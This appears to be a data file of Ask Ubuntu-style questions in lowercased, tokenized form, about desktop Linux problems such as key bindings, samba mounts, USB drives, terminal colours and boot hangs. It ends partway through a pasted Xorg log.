410546	xte called from xbindkeys is not working	i am trying to setup xbindkeys in kubuntu , since i got a new mouse with some useless buttons . i was trying to bind the f5 key to the windows-logo button on my mouse , which i identified as c:134 . unfortunately it does not seem to work . here is what i do in .xbindkeysrc '' xte 'key f5 ' '' c:134 this does not work . however , if i type into a terminal : sleep 10 ; xte 'key f5 ' and switch to another window , after 10 seconds the f5 key is correctly emulated ( for example , it will refresh the current browser page ) . it is not a problem of the key identification , either . this one will correctly launch kate . `` kate '' c:134 i really do n't get it , why xte wo n't emulate the key ! any suggestions ?
410550	sftp ( ssh ) mount check free space	how to see free space on mount over sftp ( ssh ) using nautilus ? now i have to use terminal to ssh to disk server and do df -h. i could make a script to do , but is there any existing option , possible integrated in nautilus ?
410552	mounted samba permission problem	i use lubuntu as server machine and have few lubuntu client machines . on server samba config file is configured that there is no need for passwords and everyone can write . i added every user who will access from client machines to server users and groups . folder permissions are set that owner is nobody and group - nogroup . i added all users under this group . when they access trough file manager pcmanfm ( smb : //machine-ip/folder ) , mostly everything works fine . but i need to be able to mount it . on client machine i install cifs-utils then i edit /etc/fstab and add this line //servername/sharename /home/user-2/sharename cifs guest , uid=1000 , iocharset=utf8 0 0 i mount it with user who is allowed to use sudo ( user-1 ) . after that , /home/user-2/sharename i cant write with user-2 owner is user-1 and group is nogroup , and by default on most of folders can write only owner and group . i cant change owner and group even with root , also when i add user-2 to nogroup nothing happen , i can only change under permission view content , change content and access content to everyone . then i can write with user-2 , but i cant then write to sub-folders . i need to repeat last step for every sub-folder . when from another client machine user-3 add new folder , i need again then in machine with user-1 and user-2 manually set permissions to everyone can change content . maybe this text was not clear , in short : 1 server machine lubuntu with samba . few lubutnu client machine , which need to mount this samba share and access to it . and there use folders , add new content ...
410553	the effect of putting sudo -i command in /etc/fstab	i have a computer ( computer a ) which only can be accessed by ssh from another computer ( computer b ) within internal network . ssh username @ 10.**.** . ** fyi , i do not activate root account in computer a . later on , when i already login to the computer a , i modify the /etc/fstab file by adding sudo -i as additional line in it . finally , i reboot the computer a . several minutes later , i try to login to computer a again but i can not . is it related to my modification or there is internal network down at the moment ? thanks
410557	usb shows up as two drives !	i was given a free 1gb usb at an event a few months ago - however , when i plug it in to my ubuntu laptop , the usb shows up as two drives ( /dev/sdb and /dev/sdc ) . i have checked it is n't just partitions - it is n't , since gparted also shows the usb as two drives . is it possible to merge the two drives using fdisk or gparted ? the usb was free , so i really do n't care if the thing ends up broken . i just want to experiment and see if it is possible to merge the two drives and have a working 1 gb usb . : ) lsusb output : bus 002 device 006 : id 058f:6387 alcor micro corp . transcend jetflash flash drive output of 'sudo fdisk -l' ( precise ) kida @ localhost : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 320.1 gb , 320072933376 bytes 256 heads , 63 sectors/track , 38761 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 625142447 312571223+ ee gpt partition 1 does not start on physical sector boundary . note : sector size is 4096 ( not 512 ) disk /dev/mapper/vboot : 1090 mb , 1090519040 bytes 255 heads , 63 sectors/track , 16 cylinders , total 266240 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vboot does n't contain a valid partition table note : sector size is 4096 ( not 512 ) disk /dev/mapper/vroot : 1073 mb , 1073741824 bytes 255 heads , 63 sectors/track , 16 cylinders , total 262144 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/mapper/vroot does n't contain a valid partition table disk /dev/mapper/encstateful : 94.6 gb , 94571528192 bytes 255 heads , 63 sectors/track , 11497 cylinders , total 184710016 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/mapper/encstateful does n't contain a valid partition table disk /dev/sdb : 1021 mb , 1021575168 bytes 23 heads , 54 sectors/track , 1606 cylinders , total 1995264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x56e57c2b device boot start end blocks id system /dev/sdb1 496 1995263 997384 6 fat16 disk /dev/sdc : 7 mb , 7077888 bytes 256 heads , 32 sectors/track , 1 cylinders , total 13824 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 64 13823 6880 1 fat12
410558	how to install windows 8.1 after ubuntu ? i want to dual boot	i currently have ubuntu installed and an empty partition to install windows in ( ntfs ) . if i launch boot repair after installing windows , will it restore the dual boot functionality ?
410565	using modifiers of perl-compatible regex ( pcre ) in grep	according to grep -- help and man grep , we can use the -p option in order to interpret the pattern as a perl regular expression ( pcre , to be precise ) , instead of the default posix basic regular expressions ( bre ) . in perl language , various modifiers can be added to the expression , in order to adjust the pattern interpretation ( in the syntax of /pattern/modifiers ) . so , how can someone add modifiers to the grep 's perl regular expression ? i tried some variations like grep -p `` /^got.it $ /ms '' [ file ] but the search results were wrong . however , about the pcre interpretation , the manual points out that : this is highly experimental and grep -p may warn of unimplemented features . is it possible that the grep tool does not support modifiers at all ? by the way , i noticed that one can perform case-insensitive pattern matching by using the -i option , which is an example of a modifier .
410566	ca n't get the right colors in gnome terminal	i want to use a base16 colorscheme from here . the steps i followed : cloned the repo ran the scripts changed the terminal profile to base16-default ( which did change the colors ) this is the result compared with the screenshot in the repository 's readme . i 'm running 12.04 . here 's some more info . $ echo $ term xterm $ echo $ colorterm gnome-terminal and my .bashrc . # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines in the history . see bash ( 1 ) for more options # ... or force ignoredups and ignorespace histcontrol=ignoredups : ignorespace # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi why is it showing wrong colors in my terminal ?
410570	ca n't boot ubuntu on vmware player 6.0.0	i installed ubuntu 12.0.4 on vmware player 6.0.0 and install ns2-allinone : sudo apt-get install build-essential autoconf automake libxmu-dev sudo apt-get install libx11-dev xorg-dev libxmu-dev libperl4-corelibs-perl then installed ns2-allinone2.0.35 it needs xorg . when i reboot my virtual machine it stucks on ubuntu boot screen . i know that problem relates to my hybrid radeon 7570 . is there a solution to this problem ?
410571	fixing broken packages -- /tesseract-ocr-osd_3.02-2_all.deb	i am trying to install the scanner driver of my new canon pixma mp230 printer . i was getting an error message of a broken package . i did sudo apt-get update & & sudo apt-get upgrade all when well except for the following error message reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : tesseract-ocr : depends : tesseract-ocr-osd but it is not installed e : unmet dependencies . try using -f. i also did the apt-get -f install and i got the following error afeez @ afeez-satellite-pro-l450 : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : libdbus-c++-1-0 libccgnu2-1.7-0 libyaml-0-2 libccrtp1-1.8-0 libzrtpcpp-1.4-0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : tesseract-ocr-osd the following new packages will be installed : tesseract-ocr-osd 0 upgraded , 1 newly installed , 0 to remove and 255 not upgraded . 1 not fully installed or removed . need to get 0 b/4,276 kb of archives . after this operation , 10.6 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 416240 files and directories currently installed . ) unpacking tesseract-ocr-osd ( from ... /tesseract-ocr-osd_3.02-2_all.deb ) ... dpkg-deb ( subprocess ) : data : internal gzip read error : ' : data error' dpkg-deb : error : subprocess returned error exit status 2 dpkg : error processing /var/cache/apt/archives/tesseract-ocr-osd_3.02-2_all.deb ( -- unpack ) : subprocess dpkg-deb -- fsys-tarfile returned error exit status 2 no apport report written because the error message indicates an issue on the local system errors were encountered while processing : /var/cache/apt/archives/tesseract-ocr-osd_3.02-2_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i will appreciate any help in fixing this .
410573	need a factory installed os	i bought a dell laptop with manufacturer installed ubuntu lts 12.04 , now that os is been crashed and not able to recover and there is no way to download from dell , so somebody help me to get that os back laptop : dell inspiron 3537
410578	is there any apps to use a sony netmd ?	i 'm looking for an app as well as drivers to us a sony minidisc netmd , can anyone help ?
410579	stuck at boot screen 12.04	i tried to install a lightdm greeter theme but after dissapointing results i chose to try gdm instead , which prety much reconfigured my desktop theme , so i chose to remove them both . since the last boot the computer gets stuck at the boot screen ( whom always to happened to show `` could not mount /dev/mapper/cryptswap1 m for manual s for skip '' for a while , which i always just could ignore : which shows no hard disk activity after a while . waiting for 5 minutes and it still not booting i tried to work around it by : pressing ctrl+alt+f2 to enter cli , logging in from the cli and running startx . this presents me the desktop interface without unity , so i opened a terminal and used the command unity . re-installing the removed packages , but to no avail . ok . so now i have the desktop environment , but i just want to get into my desktop environment the regular way . /var/log/xorg.0.log : [ 613.670 ] x.org x server 1.12.3 release date : 2012-07-09 [ 613.678 ] x protocol version 11 , revision 0 [ 613.681 ] build operating system : linux 2.6.24-29-xen x86_64 ubuntu [ 613.684 ] current operating system : linux nick-n76vm 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 [ 613.684 ] kernel command line : boot_image=/boot/vmlinuz-3.8.0-35-generic.efi.signed root=uuid=598ab3d1-e1aa-4041-ba78-1de8c6762331 ro quiet splash vt.handoff=7 [ 613.688 ] build date : 09 july 2012 05:20:18pm [ 613.690 ] xorg-server 2:1.12.3+git20120709+server-1.12-branch.60e0d205-0ubuntu0ricotz~precise ( for technical support please see http : //www.ubuntu.com/support ) [ 613.691 ] current version of pixman : 0.30.2 [ 613.693 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 613.693 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 613.698 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : sat jan 25 22:44:37 2014 [ 613.699 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 613.699 ] ( == ) no layout section . using the first screen section . [ 613.699 ] ( == ) no screen section available . using defaults . [ 613.699 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 613.699 ] ( ** ) | | -- > monitor `` '' [ 613.700 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 613.700 ] ( == ) automatically adding devices [ 613.700 ] ( == ) automatically enabling devices [ 613.700 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( ww ) the directory `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' does not exist . [ 613.700 ] entry deleted from font path . [ 613.700 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 613.700 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 613.700 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 613.700 ] ( ii ) loader magic : 0x7fc26f685b00 [ 613.700 ] ( ii ) module abi versions : [ 613.700 ] x.org ansi c emulation : 0.4 [ 613.700 ] x.org video driver : 12.0 [ 613.700 ] x.org xinput driver : 16.0 [ 613.700 ] x.org server extension : 6.0 [ 613.700 ] ( -- ) pci : * ( 0:0:2:0 ) 8086:0166:1043:1477 rev 9 , mem @ 0xf7400000/4194304 , 0xd0000000/268435456 , i/o @ 0x0000f000/64 [ 613.700 ] ( -- ) pci : ( 0:1:0:0 ) 10de:0de9:1043:1477 rev 161 , mem @ 0xf6000000/16777216 , 0xe0000000/268435456 , 0xf0000000/33554432 , i/o @ 0x0000e000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 613.700 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 613.700 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 613.700 ] ( ii ) `` extmod '' will be loaded by default . [ 613.700 ] ( ii ) `` dbe '' will be loaded by default . [ 613.700 ] ( ii ) `` glx '' will be loaded by default . [ 613.700 ] ( ii ) `` record '' will be loaded by default . [ 613.700 ] ( ii ) `` dri '' will be loaded by default . [ 613.700 ] ( ii ) `` dri2 '' will be loaded by default . [ 613.700 ] ( ii ) loadmodule : `` extmod '' [ 613.700 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 613.701 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.0.0 [ 613.701 ] module class : x.org server extension [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( ii ) loading extension mit-screen-saver [ 613.701 ] ( ii ) loading extension xfree86-vidmodeextension [ 613.701 ] ( ii ) loading extension xfree86-dga [ 613.701 ] ( ii ) loading extension dpms [ 613.701 ] ( ii ) loading extension xvideo [ 613.701 ] ( ii ) loading extension xvideo-motioncompensation [ 613.701 ] ( ii ) loading extension x-resource [ 613.701 ] ( ii ) loadmodule : `` dbe '' [ 613.701 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 613.701 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.0.0 [ 613.701 ] module class : x.org server extension [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( ii ) loading extension double-buffer [ 613.701 ] ( ii ) loadmodule : `` glx '' [ 613.701 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libglx.so [ 613.701 ] ( ii ) module glx : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.0.0 [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( == ) aiglx enabled [ 613.701 ] ( ii ) loading extension glx [ 613.701 ] ( ii ) loadmodule : `` record '' [ 613.701 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 613.701 ] ( ii ) module record : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.13.0 [ 613.701 ] module class : x.org server extension [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( ii ) loading extension record [ 613.701 ] ( ii ) loadmodule : `` dri '' [ 613.701 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 613.701 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.0.0 [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( ii ) loading extension xfree86-dri [ 613.701 ] ( ii ) loadmodule : `` dri2 '' [ 613.701 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 613.701 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 613.701 ] compiled for 1.12.3 , module version = 1.2.0 [ 613.701 ] abi class : x.org server extension , version 6.0 [ 613.701 ] ( ii ) loading extension dri2 [ 613.701 ] ( == ) matched intel as autoconfigured driver 0 [ 613.701 ] ( == ) matched vesa as autoconfigured driver 1 [ 613.701 ] ( == ) matched fbdev as autoconfigured driver 2 [ 613.701 ] ( == ) assigned the driver to the xf86configlayout [ 613.701 ] ( ii ) loadmodule : `` intel '' [ 613.702 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 613.702 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 613.702 ] compiled for 1.12.3 , module version = 2.99.906 [ 613.702 ] module class : x.org video driver [ 613.702 ] abi class : x.org video driver , version 12.0 [ 613.702 ] ( ii ) loadmodule : `` vesa '' [ 613.702 ] ( ww ) warning , could n't open module vesa [ 613.702 ] ( ii ) unloadmodule : `` vesa '' [ 613.702 ] ( ii ) unloading vesa [ 613.702 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 613.702 ] ( ii ) loadmodule : `` fbdev '' [ 613.702 ] ( ww ) warning , could n't open module fbdev [ 613.702 ] ( ii ) unloadmodule : `` fbdev '' [ 613.702 ] ( ii ) unloading fbdev [ 613.702 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 613.702 ] ( == ) matched intel as autoconfigured driver 0 [ 613.702 ] ( == ) matched vesa as autoconfigured driver 1 [ 613.702 ] ( == ) matched fbdev as autoconfigured driver 2 [ 613.702 ] ( == ) assigned the driver to the xf86configlayout [ 613.702 ] ( ii ) loadmodule : `` intel '' [ 613.702 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 613.702 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 613.702 ] compiled for 1.12.3 , module version = 2.99.906 [ 613.702 ] module class : x.org video driver [ 613.702 ] abi class : x.org video driver , version 12.0 [ 613.702 ] ( ii ) unloadmodule : `` intel '' [ 613.702 ] ( ii ) unloading intel [ 613.702 ] ( ii ) failed to load module `` intel '' ( already loaded , 32706 ) [ 613.702 ] ( ii ) loadmodule : `` vesa '' [ 613.702 ] ( ww ) warning , could n't open module vesa [ 613.702 ] ( ii ) unloadmodule : `` vesa '' [ 613.702 ] ( ii ) unloading vesa [ 613.702 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 613.702 ] ( ii ) loadmodule : `` fbdev '' [ 613.703 ] ( ww ) warning , could n't open module fbdev [ 613.703 ] ( ii ) unloadmodule : `` fbdev '' [ 613.703 ] ( ii ) unloading fbdev [ 613.703 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 613.703 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 [ 613.703 ] ( ii ) intel : driver for intel ( r ) hd graphics : 2000-5000 [ 613.703 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) graphics : 5100 [ 613.703 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) pro graphics : 5200 [ 613.703 ] ( -- ) using vt number 8 [ 613.707 ] drmopendevice : node name is /dev/dri/card0 [ 613.707 ] drmopendevice : open result is 8 , ( ok ) [ 613.707 ] drmopenbybusid : searching for busid pci:0000:00:02.0 [ 613.707 ] drmopendevice : node name is /dev/dri/card0 [ 613.707 ] drmopendevice : open result is 8 , ( ok ) [ 613.707 ] drmopenbybusid : drmopenminor returns 8 [ 613.707 ] drmopenbybusid : drmgetbusid reports pci:0000:00:02.0 [ 613.707 ] ( ii ) intel ( 0 ) : sna compiled : xserver-xorg-video-intel 2:2.99.906+git20131213.f350a136-0ubuntu0sarvatt~precise ( robert hooker ) [ 613.707 ] ( -- ) intel ( 0 ) : integrated graphics chipset : intel ( r ) hd graphics 4000 [ 613.707 ] ( -- ) intel ( 0 ) : cpu : x86-64 , sse2 , sse3 , ssse3 , sse4.1 , sse4.2 , avx [ 613.707 ] ( ii ) intel ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 613.707 ] ( == ) intel ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 613.707 ] ( == ) intel ( 0 ) : rgb weight 888 [ 613.707 ] ( == ) intel ( 0 ) : default visual is truecolor [ 613.708 ] ( ** ) intel ( 0 ) : framebuffer tiled [ 613.708 ] ( ** ) intel ( 0 ) : pixmaps tiled [ 613.708 ] ( ** ) intel ( 0 ) : `` tear free '' disabled [ 613.708 ] ( ** ) intel ( 0 ) : forcing per-crtc-pixmaps ? no [ 613.708 ] ( ii ) intel ( 0 ) : output lvds1 has no monitor section [ 613.708 ] ( -- ) intel ( 0 ) : found backlight control interface acpi_video1 ( type 'firmware ' ) [ 613.708 ] ( ii ) intel ( 0 ) : output vga1 has no monitor section [ 613.708 ] ( ii ) intel ( 0 ) : output virtual1 has no monitor section [ 613.708 ] ( -- ) intel ( 0 ) : output lvds1 using initial mode 1920x1080 on pipe 0 [ 613.708 ] ( == ) intel ( 0 ) : dpi set to ( 96 , 96 ) [ 613.708 ] ( ii ) loading sub module `` dri2 '' [ 613.708 ] ( ii ) loadmodule : `` dri2 '' [ 613.708 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 613.708 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 613.708 ] compiled for 1.12.3 , module version = 1.2.0 [ 613.708 ] abi class : x.org server extension , version 6.0 [ 613.708 ] ( == ) depth 24 pixmap format is 32 bpp [ 613.709 ] ( ii ) intel ( 0 ) : sna initialized with ivybridge ( gen7 , gt2 ) backend [ 613.709 ] ( == ) intel ( 0 ) : backing store disabled [ 613.709 ] ( == ) intel ( 0 ) : silken mouse enabled [ 613.709 ] ( ii ) intel ( 0 ) : hw cursor enabled [ 613.709 ] ( ii ) intel ( 0 ) : randr 1.2 enabled , ignore the following randr disabled message . [ 613.709 ] ( == ) intel ( 0 ) : dpms enabled [ 613.709 ] ( ii ) intel ( 0 ) : [ dri2 ] setup complete [ 613.709 ] ( ii ) intel ( 0 ) : [ dri2 ] dri driver : i965 [ 613.709 ] ( ii ) intel ( 0 ) : direct rendering : dri2 enabled [ 613.709 ] ( == ) intel ( 0 ) : hotplug detection : `` enabled '' [ 613.709 ] ( -- ) randr disabled [ 613.709 ] ( ii ) initializing built-in extension generic event extension [ 613.709 ] ( ii ) initializing built-in extension shape [ 613.709 ] ( ii ) initializing built-in extension mit-shm [ 613.709 ] ( ii ) initializing built-in extension xinputextension [ 613.709 ] ( ii ) initializing built-in extension xtest [ 613.709 ] ( ii ) initializing built-in extension big-requests [ 613.709 ] ( ii ) initializing built-in extension sync [ 613.709 ] ( ii ) initializing built-in extension xkeyboard [ 613.709 ] ( ii ) initializing built-in extension xc-misc [ 613.709 ] ( ii ) initializing built-in extension security [ 613.709 ] ( ii ) initializing built-in extension xinerama [ 613.710 ] ( ii ) initializing built-in extension xfixes [ 613.710 ] ( ii ) initializing built-in extension render [ 613.710 ] ( ii ) initializing built-in extension randr [ 613.710 ] ( ii ) initializing built-in extension composite [ 613.710 ] ( ii ) initializing built-in extension damage [ 613.724 ] ( ii ) aiglx : enabled glx_mesa_copy_sub_buffer [ 613.724 ] ( ii ) aiglx : enabled glx_intel_swap_event [ 613.724 ] ( ii ) aiglx : enabled glx_sgi_swap_control and glx_mesa_swap_control [ 613.724 ] ( ii ) aiglx : glx_ext_texture_from_pixmap backed by buffer objects [ 613.724 ] ( ii ) aiglx : loaded and initialized i965 [ 613.724 ] ( ii ) glx : initialized dri2 gl provider for screen 0 [ 613.726 ] ( ii ) intel ( 0 ) : switch to mode 1920x1080 @ 60.0 on lvds1 using pipe 0 , position ( 0 , 0 ) , rotation normal , reflection none [ 613.748 ] ( ii ) intel ( 0 ) : setting screen physical size to 508 x 285 [ 613.760 ] ( ii ) xkb : reuse xkmfile /tmp/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 613.762 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 613.762 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 613.762 ] ( ii ) loadmodule : `` evdev '' [ 613.762 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 613.762 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 613.762 ] compiled for 1.12.1 , module version = 2.7.0 [ 613.762 ] module class : x.org xinput driver [ 613.762 ] abi class : x.org xinput driver , version 16.0 [ 613.762 ] ( ii ) using input driver 'evdev ' for 'power button' [ 613.762 ] ( ** ) power button : always reports core events [ 613.762 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 613.762 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 613.762 ] ( -- ) evdev : power button : found keys [ 613.762 ] ( ii ) evdev : power button : configuring as keyboard [ 613.762 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 613.762 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 613.762 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.762 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.762 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.762 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.764 ] ( ii ) xkb : reuse xkmfile /tmp/server-a5431d4a34463c892c9e905e2e421b30a3cc30dd.xkm [ 613.764 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event5 ) [ 613.764 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 613.764 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 613.764 ] ( ** ) video bus : always reports core events [ 613.764 ] ( ** ) evdev : video bus : device : `` /dev/input/event5 '' [ 613.764 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 613.764 ] ( -- ) evdev : video bus : found keys [ 613.764 ] ( ii ) evdev : video bus : configuring as keyboard [ 613.764 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/lnxvideo:01/input/input5/event5 '' [ 613.764 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 613.764 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 613.764 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 613.764 ] ( ** ) option `` xkb_layout '' `` us '' [ 613.764 ] ( ** ) option `` xkb_variant '' `` intl '' [ 613.765 ] ( ii ) config/udev : adding input device video bus ( 